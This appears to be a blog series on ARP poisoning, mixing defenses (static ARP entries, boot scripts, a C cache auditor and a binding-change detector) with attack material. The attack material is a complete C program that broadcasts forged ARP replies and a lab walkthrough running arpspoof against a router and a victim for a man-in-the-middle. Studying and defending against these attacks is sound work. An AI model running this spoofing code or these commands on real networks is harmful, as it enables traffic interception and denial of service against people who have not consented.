
Thursday, August 1, 2013

Defense Against ARP Poisoning

The main reason ARP poisoning works is that the victim does not authenticate ARP replies, so a reply from a malicious user is accepted as-is. As a result the ARP cache on the victim's PC contains an invalid IP-to-MAC mapping and packets are sent to the attacker or dropped.

Defense in small networks

To view the current entries in the ARP table
   victim#arp

To add a static/permanent entry to the ARP table
   victim#arp -s <ip_Address> <MAC_address>
ARP replies sent by the attacker do not affect static entries. The replies are still received by the victim, but they do not overwrite the statically entered mapping.

To delete an entry in the ARP table
  victim#arp -d <ip_address>

If there are too many entries to type by hand, the mappings can be stored in a file and given as input to "arp".
Create a file with the entries in the following syntax
<MAC_ADDRESS> <IP_ADDRESS>
. .
. .
 
 victim#arp -f <file>

But the table is cleared every time the system boots or the network is reset.


To load the entries into the table every time the network adapter is brought UP,
create a file in the /etc/network/if-up.d/ directory with the following contents

#!/bin/sh
   arp -i eth0 -s <ip_address> <mac_address>
   .
   .

Make it executable
  victim# chmod +x /etc/network/if-up.d/<file>
This comes into effect only after a reboot.

Also, if you don't want to accept ARP replies from anyone:

  victim# echo 0 > /proc/sys/net/ipv4/conf/all/arp_accept
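To check that the static entries actually took hold, and to spot a cache entry that no longer matches the trusted list, here is an added example in C (not part of the original post). It parses a trusted `<MAC_ADDRESS> <IP_ADDRESS>` list in the file format used above and a cache snapshot in the text format of /proc/net/arp. Both inputs are constructed sample data embedded in the program, and the addresses are made up; the flag value 0x4 is the kernel's ATF_PERM bit (0x2 is ATF_COM, complete), which is why an entry set with `arp -s` shows flags 0x6. An entry whose MAC differs from the trusted one is reported as poisoned; a correct entry without the permanent flag is reported too, since that is exactly what the table looks like after a reboot has flushed the static entries.

```c
#include <stdio.h>
#include <string.h>

#define MAX_ENTRIES 32
#define ATF_PERM    0x04   /* permanent entry, set with arp -s (value from linux/if_arp.h; 0x02 = complete) */

struct entry { char ip[16]; unsigned char mac[6]; unsigned flags; };

/* Trusted mappings in the post's "<MAC_ADDRESS> <IP_ADDRESS>" file order (constructed sample). */
static const char TRUSTED[] =
    "# gateway and two hosts\n"
    "00:11:22:33:44:01 192.168.1.1\n"
    "00:11:22:33:44:03 192.168.1.3\n"
    "00:11:22:33:44:04 192.168.1.4\n";

/* Constructed /proc/net/arp snapshot: .1 carries the wrong MAC, .4 is correct but only dynamic. */
static const char ARP_CACHE[] =
    "IP address       HW type     Flags       HW address            Mask     Device\n"
    "192.168.1.1      0x1         0x2         00:11:22:33:44:02     *        eth0\n"
    "192.168.1.3      0x1         0x6         00:11:22:33:44:03     *        eth0\n"
    "192.168.1.4      0x1         0x2         00:11:22:33:44:04     *        eth0\n"
    "192.168.1.7      0x1         0x2         00:11:22:33:44:07     *        eth0\n";

/* Parse "aa:bb:cc:dd:ee:ff" into six bytes and reject anything else. Returns 0 on success. */
int parse_mac(const char *s, unsigned char mac[6])
{
    unsigned v[6]; char tail; int i;
    if (sscanf(s, "%2x:%2x:%2x:%2x:%2x:%2x%c", &v[0], &v[1], &v[2], &v[3], &v[4], &v[5], &tail) != 6)
        return -1;
    for (i = 0; i < 6; i++) mac[i] = (unsigned char) v[i];
    return 0;
}

/* 1 if s is a dotted quad with every octet in 0..255, else 0. */
int valid_ipv4(const char *s)
{
    unsigned o[4]; char tail;
    if (sscanf(s, "%3u.%3u.%3u.%3u%c", &o[0], &o[1], &o[2], &o[3], &tail) != 4) return 0;
    return o[0] < 256 && o[1] < 256 && o[2] < 256 && o[3] < 256;
}

static const char *mac_str(const unsigned char *m, char buf[18])
{
    snprintf(buf, 18, "%02x:%02x:%02x:%02x:%02x:%02x", m[0], m[1], m[2], m[3], m[4], m[5]);
    return buf;
}

/* Copy the next line of text into buf (NUL-terminated); returns the remainder or NULL at end. */
static const char *next_line(const char *text, char *buf, size_t n)
{
    const char *nl;
    size_t len;
    if (text == NULL || *text == '\0') return NULL;
    nl = strchr(text, '\n');
    len = nl ? (size_t) (nl - text) : strlen(text);
    if (len >= n) len = n - 1;
    memcpy(buf, text, len); buf[len] = '\0';
    return nl ? nl + 1 : text + strlen(text);
}

/* Load the trusted list; every non-comment line must be exactly "<MAC> <IP>". Returns count or -1. */
int load_trusted(const char *text, struct entry *out, int max)
{
    char line[128], mac[32], ip[32], extra[2];
    int n = 0;
    while ((text = next_line(text, line, sizeof line)) != NULL) {
        if (line[0] == '#' || line[0] == '\0') continue;
        if (n == max || sscanf(line, "%31s %31s %1s", mac, ip, extra) != 2) return -1;
        if (parse_mac(mac, out[n].mac) != 0 || !valid_ipv4(ip)) return -1;
        strcpy(out[n].ip, ip); out[n++].flags = ATF_PERM;
    }
    return n;
}

/* Load a /proc/net/arp style table: "IP  HWtype  Flags  HWaddress  Mask  Device". Returns count or -1. */
int load_cache(const char *text, struct entry *out, int max)
{
    char line[160], ip[32], mac[32];
    int n = 0;
    while ((text = next_line(text, line, sizeof line)) != NULL) {
        if (strncmp(line, "IP address", 10) == 0 || line[0] == '\0') continue;   /* header line */
        if (n == max || sscanf(line, "%31s %*x %x %31s", ip, &out[n].flags, mac) != 3) return -1;
        if (!valid_ipv4(ip) || parse_mac(mac, out[n].mac) != 0) return -1;
        strcpy(out[n++].ip, ip);
    }
    return n;
}

/* Compare the cache against the trusted list. Returns the number of findings (poisoned or non-static). */
int audit(const struct entry *t, int nt, const struct entry *c, int nc)
{
    char a[18], b[18];
    int i, j, findings = 0;
    for (i = 0; i < nt; i++) {
        const struct entry *hit = NULL;
        for (j = 0; j < nc; j++)
            if (strcmp(t[i].ip, c[j].ip) == 0) { hit = &c[j]; break; }
        if (hit == NULL) {
            printf("INFO     %s has no cache entry yet\n", t[i].ip);
        } else if (memcmp(t[i].mac, hit->mac, 6) != 0) {
            printf("POISONED %s expected %s, cache has %s\n", t[i].ip, mac_str(t[i].mac, a), mac_str(hit->mac, b));
            findings++;
        } else if (!(hit->flags & ATF_PERM)) {
            printf("DYNAMIC  %s correct MAC but not static (flags 0x%x); arp -s did not take effect\n", t[i].ip, hit->flags);
            findings++;
        }
    }
    return findings;
}

/* Run the audit on the embedded sample data; returns findings, or -1 on malformed input. */
int run_audit(void)
{
    struct entry t[MAX_ENTRIES], c[MAX_ENTRIES];
    int nt = load_trusted(TRUSTED, t, MAX_ENTRIES), nc = load_cache(ARP_CACHE, c, MAX_ENTRIES);
    if (nt < 0 || nc < 0) { fputs("malformed input\n", stderr); return -1; }
    return audit(t, nt, c, nc);
}

int main(void) { return run_audit() == 2 ? 0 : 1; }
```

Against a live system, replace the embedded ARP_CACHE text with the contents of /proc/net/arp and TRUSTED with the same file you pass to `arp -f`; running it at the end of the if-up.d script, after the `arp -s` lines, confirms that every entry came up with the 0x4 permanent bit set.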


Wednesday, July 31, 2013

ARP Reply Spoof - C code



'ARP SPOOFING - VBox+GNS3 test' contains an introduction to ARP, how it works and ARP spoofing. To understand this post it is recommended that you have a basic idea of these topics.

In the code given below we broadcast an ARP reply on the specified interface. The interface, source IP address and source MAC address are given as parameters to the program. The destination MAC address is set to all 1s for broadcasting. The ARP reply is rebroadcast periodically using sleep() so that the genuine ARP reply is not cached in the target systems' ARP tables.


Applications of ARP Spoofing

  • Denial of Service: The hacker can broadcast an ARP reply whose source IP is that of a router/gateway and whose source MAC address is false. Now when a host tries to send a packet to the router/gateway, it is dropped, and the hacker has cut the network off from the other side of the gateway (the internet).
  • Man-in-the-middle: Here the attacker sends an ARP reply to victim-1 stating that it is victim-2. An ARP reply is also sent to victim-2 stating that the attacker is victim-1. Packet forwarding is enabled on the attacker so that all packets between victim-1 and victim-2 pass through it.

ARP Packet


Ethernet Packet


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <signal.h>
#include <sys/socket.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netpacket/packet.h>
#include <netinet/if_ether.h>

int sock;

#define PACKET_LEN (sizeof(struct ether_header) + sizeof(struct ether_arp))

//SIGINT handler: close the raw socket and exit
void close_sock(int sig)
{
  (void) sig;
  close(sock);
  exit(0);
}

int main(int argc, char ** argv)
{
  char packet[PACKET_LEN];
  struct sockaddr_ll device;
  struct ether_header * eth = (struct ether_header *) packet;
  struct ether_arp * arp = (struct ether_arp *) (packet + sizeof(struct ether_header));

  if (argc < 4)
  {
    puts("Usage: ./a.out <interface> <source ip address> <source mac address>");
    exit(1);
  }

  sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));
  if (sock < 0)
  {
    perror("socket");
    exit(1);
  }

  signal(SIGINT, close_sock);

  //Source Hardware Address : ARP Packet
  //%hhx stores one byte per field; casting the one-byte slots to unsigned int * would write past them
  if (sscanf(argv[3], "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx",
             &arp->arp_sha[0], &arp->arp_sha[1], &arp->arp_sha[2],
             &arp->arp_sha[3], &arp->arp_sha[4], &arp->arp_sha[5]) != 6)
  {
    fprintf(stderr, "Invalid MAC address: %s\n", argv[3]);
    exit(1);
  }

  //Source Protocol Address : ARP Packet (four bytes in network byte order)
  if (inet_pton(AF_INET, argv[2], arp->arp_spa) != 1)
  {
    fprintf(stderr, "Invalid IP address: %s\n", argv[2]);
    exit(1);
  }

  //Ethernet Packet
  memset(eth->ether_dhost, 0xff, ETH_ALEN); //destination address : broadcast address
  memcpy(eth->ether_shost, arp->arp_sha, ETH_ALEN); //source address
  eth->ether_type = htons(ETH_P_ARP); //type

  //ARP Packet
  arp->ea_hdr.ar_hrd = htons(ARPHRD_ETHER); //Format of hardware address
  arp->ea_hdr.ar_pro = htons(ETH_P_IP); //Format of protocol address.
  arp->ea_hdr.ar_hln = ETH_ALEN; //Length of hardware address.
  arp->ea_hdr.ar_pln = 4; //Length of protocol address.
  arp->ea_hdr.ar_op = htons(ARPOP_REPLY); //ARP operation : REPLY
  memset(arp->arp_tha, 0xff, ETH_ALEN); //Target hardware address.
  memset(arp->arp_tpa, 0x00, 4); //Target protocol address.

  memset(&device, 0, sizeof(device));
  device.sll_ifindex = if_nametoindex(argv[1]); //Interface number
  if (device.sll_ifindex == 0)
  {
    perror("if_nametoindex");
    exit(1);
  }
  device.sll_family = AF_PACKET;
  memcpy(device.sll_addr, arp->arp_sha, ETH_ALEN); //Physical layer address
  device.sll_halen = ETH_ALEN; //Length of address (a single byte, so no htons())

  printf("Press Ctrl+C to stop \n");
  while (1) {
    printf("Broadcasting on %s: %s is at %s\n", argv[1], argv[2], argv[3]);
    if (sendto(sock, packet, PACKET_LEN, 0, (struct sockaddr *) &device, sizeof(device)) < 0)
      perror("sendto");
    sleep(2);
  }
  return 0;
}





ARP SPOOFING - VBox+GNS3 test

Address Resolution Protocol (ARP) is the protocol used to resolve network layer addresses (IP addresses) into link layer addresses (MAC addresses). ARP was defined by RFC 826 in 1982. It is a request and reply protocol used only within the boundaries of a single network, never across internetwork nodes.

ARP works on Ethernet networks as follows.
When any device wishes to send data to a target device over Ethernet, it must first determine the MAC address of that target given its IP address. These IP-to-MAC mappings are derived from an ARP cache maintained on each device. If the given IP address does not appear in a device's cache, that device cannot direct messages to the target until it obtains a new mapping. To do this, the initiating device first sends an ARP request as a broadcast message on the local subnet. The host with the given IP address sends an ARP reply in response to the broadcast, allowing the initiating device to update its cache and proceed to deliver messages directly to the target. ARP provides no method for authenticating replies, so ARP replies can come from systems other than the one that owns the requested Layer 2 address.

In ARP spoofing the answering system, or spoofer, replies to a request for another system's address with the aim of intercepting data bound for that system. A malicious user may use ARP spoofing to perform a man-in-the-middle or denial-of-service attack on other users on the network.
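The request/reply exchange and the missing authentication described above are easiest to see at the frame level. The following is an added example in C, not code from the original post: it decodes an Ethernet II + ARP frame field by field (hardware type, protocol type, address lengths, opcode, sender and target addresses, each at its RFC 826 wire offset) and implements the passive check that tools such as arpwatch perform: remember the first MAC seen for each sender IP and raise an alert when a later frame binds that IP to a different MAC. It also flags a reply whose Ethernet source address is not its own ARP sender address. The frames it replays are constructed in the program; the 00:11:22:33:44:xx addresses and the 192.168.1.x hosts are made up for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ETH_HDR_LEN   14
#define ARP_FRAME_LEN (ETH_HDR_LEN + 28)   /* Ethernet II header + IPv4-over-Ethernet ARP body */
#define MAX_BIND      16

struct arp_pkt {
    uint8_t  eth_dst[6], eth_src[6];
    uint16_t eth_type, hrd, pro, op;
    uint8_t  hln, pln;
    uint8_t  sha[6], spa[4], tha[6], tpa[4];      /* sender/target hardware and protocol addresses */
};

struct arp_monitor { uint8_t ip[MAX_BIND][4], mac[MAX_BIND][6]; int n; };  /* learned IP -> MAC */

enum arp_verdict { ARP_OK, ARP_NEW_BINDING, ARP_MALFORMED, ARP_ETH_SRC_MISMATCH, ARP_MAC_CHANGED };

static uint16_t be16(const uint8_t *p) { return (uint16_t) ((p[0] << 8) | p[1]); }

/* Decode one frame by wire offset (RFC 826). Returns 0 on success, -1 if the frame is short
 * or is not IPv4-over-Ethernet ARP (hrd 1, pro 0x0800, hln 6, pln 4, op 1 or 2). */
int parse_arp(const uint8_t *buf, size_t len, struct arp_pkt *p)
{
    const uint8_t *a;
    if (len < ARP_FRAME_LEN) return -1;
    a = buf + ETH_HDR_LEN;
    memcpy(p->eth_dst, buf, 6);
    memcpy(p->eth_src, buf + 6, 6);
    p->eth_type = be16(buf + 12);
    p->hrd = be16(a);  p->pro = be16(a + 2);  p->hln = a[4];  p->pln = a[5];  p->op = be16(a + 6);
    if (p->eth_type != 0x0806 || p->hrd != 1 || p->pro != 0x0800 || p->hln != 6 || p->pln != 4)
        return -1;
    if (p->op != 1 && p->op != 2) return -1;
    memcpy(p->sha, a + 8, 6);   memcpy(p->spa, a + 14, 4);
    memcpy(p->tha, a + 18, 6);  memcpy(p->tpa, a + 24, 4);
    return 0;
}

/* Passive check in the spirit of arpwatch: remember the first MAC seen for each sender IP
 * (requests and replies alike) and flag a later frame that binds that IP to another MAC.
 * A reply whose Ethernet source is not its own ARP sender MAC is flagged as forged outright. */
enum arp_verdict arp_monitor_feed(struct arp_monitor *m, const uint8_t *buf, size_t len)
{
    struct arp_pkt p;
    int i;
    if (parse_arp(buf, len, &p) != 0) return ARP_MALFORMED;
    if (p.op == 2 && memcmp(p.eth_src, p.sha, 6) != 0) return ARP_ETH_SRC_MISMATCH;
    for (i = 0; i < m->n; i++)
        if (memcmp(m->ip[i], p.spa, 4) == 0)
            return memcmp(m->mac[i], p.sha, 6) == 0 ? ARP_OK : ARP_MAC_CHANGED;
    if (m->n < MAX_BIND) {
        memcpy(m->ip[m->n], p.spa, 4);
        memcpy(m->mac[m->n], p.sha, 6);
        m->n++;
    }
    return ARP_NEW_BINDING;
}

/* Build a constructed broadcast ARP frame (test data, not captured traffic). */
void build_arp(uint8_t *buf, const uint8_t *eth_src, uint16_t op,
               const uint8_t *sha, const uint8_t *spa, const uint8_t *tha, const uint8_t *tpa)
{
    static const uint8_t hdr[8] = { 0x00, 0x01, 0x08, 0x00, 0x06, 0x04, 0x00, 0x00 };
    uint8_t *a = buf + ETH_HDR_LEN;
    memset(buf, 0xff, 6);                    /* broadcast destination */
    memcpy(buf + 6, eth_src, 6);
    buf[12] = 0x08;  buf[13] = 0x06;         /* EtherType ARP */
    memcpy(a, hdr, 8);                       /* hrd=1, pro=0x0800, hln=6, pln=4; op filled below */
    a[6] = (uint8_t) (op >> 8);  a[7] = (uint8_t) (op & 0xff);
    memcpy(a + 8, sha, 6);  memcpy(a + 14, spa, 4);  memcpy(a + 18, tha, 6);  memcpy(a + 24, tpa, 4);
}

static const char *verdict_name[] = { "ok", "new binding", "malformed", "eth-src mismatch", "MAC CHANGED" };
static enum arp_verdict demo_result[5];

/* Replay five constructed frames through one monitor; returns the number of alerts raised. */
int run_demo(void)
{
    static const uint8_t gw_mac[6]  = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x01 };   /* made-up addresses */
    static const uint8_t bad_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x02 };
    static const uint8_t no_mac[6]  = { 0 };
    static const uint8_t gw_ip[4]   = { 192, 168, 1, 1 }, host_ip[4] = { 192, 168, 1, 3 };
    uint8_t f[ARP_FRAME_LEN];
    struct arp_monitor m;
    int i, alerts = 0;

    memset(&m, 0, sizeof m);
    build_arp(f, gw_mac, 2, gw_mac, gw_ip, no_mac, host_ip);        /* genuine reply from the gateway */
    demo_result[0] = arp_monitor_feed(&m, f, ARP_FRAME_LEN);
    demo_result[1] = arp_monitor_feed(&m, f, ARP_FRAME_LEN);        /* same binding seen again */
    build_arp(f, bad_mac, 2, bad_mac, gw_ip, no_mac, host_ip);      /* gateway IP now claimed by another MAC */
    demo_result[2] = arp_monitor_feed(&m, f, ARP_FRAME_LEN);
    build_arp(f, bad_mac, 2, gw_mac, gw_ip, no_mac, host_ip);       /* Ethernet source != ARP sender MAC */
    demo_result[3] = arp_monitor_feed(&m, f, ARP_FRAME_LEN);
    demo_result[4] = arp_monitor_feed(&m, f, ETH_HDR_LEN + 10);     /* truncated frame */

    for (i = 0; i < 5; i++) {
        printf("frame %d: %s\n", i, verdict_name[demo_result[i]]);
        if (demo_result[i] >= ARP_MALFORMED) alerts++;
    }
    return alerts;
}

enum arp_verdict demo_verdict(int i) { return demo_result[i]; }

int main(void) { return run_demo() == 3 ? 0 : 1; }
```

Frame 2 is the case the spoofing tool in the previous post produces (the forged reply carries a consistent Ethernet source, so only the binding change gives it away), which is why the learned IP-to-MAC table, not header consistency, is the check that matters; on a live network the same loop would be fed from an AF_PACKET socket bound to ETH_P_ARP instead of the constructed frames.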

Here in this tutorial we try a man-in-the-middle attack where the attacker sends an ARP reply to the router stating that it is the victim. An ARP reply is also sent to the victim stating that the attacker is the router.

Set up a network with at least 2 hosts connected to an Ethernet switch. This switch is connected to a router. The network I used is shown below.

Network Simulation Software : GNS3


R1 :      Cisco 3620 Router | 192.168.1.1
BT5R2 :   BackTrack 5 R2    | 192.168.1.2 | MAC_ID_1 | Attacker
Mint 12 : Linux Mint 12     | 192.168.1.3 | MAC_ID_2 | Victim

BT5R2
terminal#1 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.1 192.168.1.3
This sends ARP replies to R1 stating that BT5R2 is 192.168.1.3,
so R1 saves MAC_ID_1 as the MAC ID of 192.168.1.3.
This reply is sent regularly, so don't close this process.

terminal#2 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.3 192.168.1.1
This sends ARP replies to Mint 12 stating that BT5R2 is 192.168.1.1,
so Mint 12 saves MAC_ID_1 as the MAC ID of 192.168.1.1.
This reply is sent regularly, so don't close this process.

terminal#3 @ BT5R2
BT5R2# echo 1 > /proc/sys/net/ipv4/ip_forward
Enable IP forwarding
BT5R2# wireshark &
Start Wireshark so that you can capture the packets for verification.


Mint 12
Mint12# ping 192.168.1.1
Ping R1 and check Wireshark on BT5R2 for 'Redirect' packets.
Those packets will be highlighted in black.

R1
To check R1 ARP mapping 
R1#show arp